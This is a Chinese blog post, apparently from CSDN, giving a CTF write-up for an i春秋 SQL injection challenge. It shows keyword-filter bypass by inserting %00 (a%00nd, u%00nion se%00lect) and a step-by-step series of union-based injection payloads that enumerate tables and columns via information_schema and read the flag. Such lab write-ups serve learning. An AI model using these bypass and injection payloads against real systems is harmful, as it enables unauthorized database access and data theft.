i春秋 “百度杯”CTF比赛 九月场 SQL %00截断绕过

最新推荐文章于 2024-04-17 02:28:03 发布
最新推荐文章于 2024-04-17 02:28:03 发布
阅读量2.6k 收藏 1
点赞数 2
分类专栏: CTF -WEB 学习 文章标签: php apache 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AAAAAAAAAAAA66/article/details/121667133
版权

题目

不走就不走

 直接注入

id=1 and 1=2

 怀疑过滤,尝试到%00 截断是否能过滤。

(这里讲解下过滤知识)

本题是后端是通过匹配and select 等字符串来进行匹配的,在and中加入%00,为a%00nd 可以绕过匹配,但实际运行中服务器会将%00解析为空,这样就可实现绕过。

?id=1 a%00nd 1=2  
//这样服务器过滤and的话 a%00nd!=and 这样我们就绕过了
//之后服务器解析我们的代码 id=1 a%00nd 1=2 %00会被解析为空
//最后服务器执行的代码是 id=1 and 1=2

 

 无回显,判断存在注入,且为字符型注入。

order by 1~99 获取 注入字段长度()

?id=1 or%00der by 4

 到4出现异常回显,判断数据库字段为3.

爆可注入字段名(union 也要加%00)

?id=1 u%00nion se%00lect 1,2,3

 找到注入点,第2个参数位置可注入

爆数据库名

?id=1 u%00nion se%00lect 1,database(),3

 爆表名

?id=1 u%00nion se%00lect 1,table_name,3  from information_schema.tables where table_schema='sqli'

得到表名 info 和 users

先爆info

?id=1 u%00nion se%00lect 1,group_concat(column_name),3  from information_schema.columns where table_name='info'

 

得到字段名  肯定先选flAg_T5ZNdrm

爆出flAg_T5ZNdrm 改字段的值

?id=1 u%00nion se%00lect 1,flAg_T5ZNdrm,3  from info

 

得到Flag

AAAAAAAAAAAA66
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
“百度杯”CTF比赛 九月场 考脑洞,你能过么?python3
weixin_42357645的博客
11-14 350
考脑洞,你能过么?python3 “百度杯”CTF比赛 九月场 Writeup 题解 0x01 changame.ichunqiu.com/index.php?jpg=hei.jpg 根据url格式就想试一下jpg=index.php 浏览器F12查看源码img标签似乎是base64 直接上python3代码 #ready import requests import re import base64 from time import sleep urlPart1='9fa9f9800df645d298a2
[NCTF2019]SQLi——%00截断的“呼唤”
Mrs_H的博客
11-01 772
前言 本来是想趁这个时间点把逆向的作业做一做的,哪想到我装有工具的虚拟机突然暴毙了。抱着个电脑没什么可以做的,没事闲的又做了道sql的题目,也算是弥补了昨天没做题目的遗憾。 正文 关于%00的截断原理是这样的: 0x00是字符串的结束标识符,攻击者可以利用手动添加字符串标识符的方式来将后面的内容进行截断,而后面的内容又可以帮助我们绕过检测。 但是这道题我们不是通过%00后面的内容去绕过文件格式的过滤,我们是要通过%00帮我们把最后的引号给屏蔽掉,这是我们的最终目的。 先来看题。 题目的作者让我们去构建
2024年春秋杯冬季赛-部分赛题Wp_勒索流量ichunqiu,2024网络安全大厂面试集合
最新发布
2401_83621541的博客
04-17 744
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
CTF-Web5(00截断
→_→
08-19 1253
5.上传绕过 题目名字和提示都说的很明确,这题是一道上传绕过的题目,点开题目链接,可以看到一个文件上传的界面: 这里可以尝试随便上传一些文件,看看效果: 先尝试上传一个jpg文件: 上传jpg文件的提示为必须上传后缀名为php的文件才行,那么我们再上传一个php文件: 上传的结果是告诉我们仅支持jpg,gif,png后缀的文件。 仅支持上传jpg,gif,png后缀的文件,但是上传后又会提示必须上传后缀名为php的文件才行。 那么现在这个问题该怎么去解决呢,目前有一个思.
i春秋CTF题库---Who are you详解
weixin_34279246的博客
05-16 1289
1、进入链接,提示说不是管理员我们查看源代码,也没有任何线索2、查看请求头既然什么线索没有我们不妨在请求头里面找找看。接下来我们抓包看一看,3、解码cookie在cookie那里有一个角色的base64编码字符串,开始提示不是说没有管理员角色的凭证吗?这个应该就是喽。线索找到,我们将其解码,猜想thrfg是经过rot13加密过得。Rot13加密原理:回转13位,一种简易的置换暗码。ROT13也是过...
i春秋 CTF大本营 竞赛训练营 200+道题目答案
03-30
i春秋 CTF大本营 竞赛训练营 200+道题目答案 竞赛包括冬令营白帽黑客专项训练赛之春秋杯等 国内比较好的安全知识在线学习平台,把复杂的操作系统、工具和网络环境完整的在网页进行重现,为学习者提供完全贴近实际...
百度杯CTF比赛二月第三场比赛(Reverse专题赛)的CrackMe-1题目
03-30
百度杯CTF比赛二月第三场比赛(Reverse专题赛)的CrackMe-1题目。
领航杯 CTF 2021 决赛 真题 7z
12-07
领航杯 CTF 2021 决赛
工匠杯-CTF(题目+exp+解题思路)
04-01
CTF竞赛模式具体分为以下三类: 一、解题模式(Jeopardy) 在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程...资源包括工匠杯比赛的三道题目和exp,并详细写出了解题思路。
中山市香山杯 2021 CTF zip
12-07
中山市香山杯 2021 CTF zip
2019 CTF题目下载及write up(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
CTF安全大赛必刷题
sql注入bypass深究
qq_40495877的博客
04-04 497
创作初心:对于计算机的学习者来说,初期的学习无疑是最迷茫和难以坚持的,中后期主要是经验和能力的提高,我也刚接触计算机1年,也在不断的探索,在CSDN写博客主要是为了分享自己的学习历程,学习方法,总结的经验等等,希望能帮助到大家座右铭:不要让时代的悲哀成为你的悲哀专研方向:网络安全,数据结构;每日emo:晚安,换个世界想你,待会见本文分享了我自己总结的常规常规操作步骤,足够在日常sql渗透测试时使用,适合一些对渗透测试流程不是特别清晰的同学观看,
web安全之SQL注入绕过技术(二)
Longwaer
02-24 1426
学习掌握SQL注入绕过技术,更好的用于日常渗透测试中发现风险点。
“百度杯”CTF比赛 九月SQL-writeup
大方子
07-31 2919
  这题自己的收获:用<>隔开敏感字符,绕过防注入   题目界面: 刚开始还是老规矩输入and 1=1  发现被拦截  此外 测试了or 发现也进行了拦截 我们可以用下面的字符来替换 and 和 or and---->&&    ,     or-----> ||       替换后发现可以成功绕过 接下来进行猜字段长度  发...
“百度杯”CTF比赛 九月场------123
大方子
08-07 1756
==================================== 个人收获: 1.时常留意备份文件 2.文件读取漏洞 3.疑问最后一步的flag,如果加了.php双写无法绕过,只能是不加后缀的flaflagg才能绕过 ====================================   题目界面:   右键查看源码信息 出现   试了下密码为zhan...
"百度杯"CTF 9月2日 WriteUp.md
Bendawang's Blog
09-04 9641
"百度杯"CTF 9月2日 WriteUp
CTF-web 第二部分 SQL注入(2)
iamsongyu的博客
10-08 639
sql注入 sql三大法宝 mid(),substr(),left() mid截断函数–》MID(column_name,start[,length]) 前两个必须 最后可选 substr()函数–》 Substr()和substring()函数实现的功能是一样的,均为截取字符串。 (string, start, length) 从1开始的 Left()函数–》得到字符串左部指定个数的字符 L...
“百度杯”CTF比赛 九月场--web Upload
hanjinrui15的博客
12-30 615
“百度杯”CTF比赛 九月场--web Upload基础知识1、什么是一句话木马?2、一句话木马的简要原理3、html渲染过程解析渲染该过程主要分为以下步骤:解决方案:4、PHP中substr()函数解题思路1、代码分析2、求解题目总结 基础知识 1、什么是一句话木马? 最简单的理解就是,一句话木马上传到网站后台,然后我们可以通过提交参数等的方式去获取shell,比如拿菜刀或者蚁剑等工具。比如下面这段php一句话木马: <?php @eval($_POST['key']) ?> 【基本原理
福建闽盾杯 ctf比赛题目
08-26
福建闽盾杯CTF比赛题目是指“福建”和“闽盾杯”这两个关键词所组成的CTF比赛的题目。CTF(Capture The Flag,夺旗赛)是一种网络安全竞赛,旨在考验选手在网络攻防和信息安全方面的技能。 福建作为一个华南沿海省份,具有独特的地理、人文和历史背景。以此为题目,可以设计与福建相关的题目,如“福建的历史文化”、“福建的名胜古迹”、“福建特色美食”等等。选手在解答题目过程中,需要了解福建的相关知识,并运用自己的搜索、分析和解决问题的能力,最终找到答案。 而“闽盾杯”是指福建省网络安全协会举办的一项CTF比赛。我无法提供具体的题目,因为每届比赛的题目都不同,涵盖的领域也各有不同。根据以往比赛的经验,题目的类型可以包括密码学、网站漏洞、二进制安全、逆向工程、隐写术等等。选手需要在限定时间内根据提示或已给出的信息,分析、解决问题并提交答案。 CTF比赛旨在提高选手的网络安全技能、加深对信息安全的理解和运用,并且培养团队合作和应急响应的能力。福建闽盾杯作为一项有影响力的CTF比赛,吸引了许多对网络安全感兴趣的人士参与。参赛者可以通过参加该比赛,不断学习、提升自己的技术水平,同时也为网络安全事业贡献力量。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值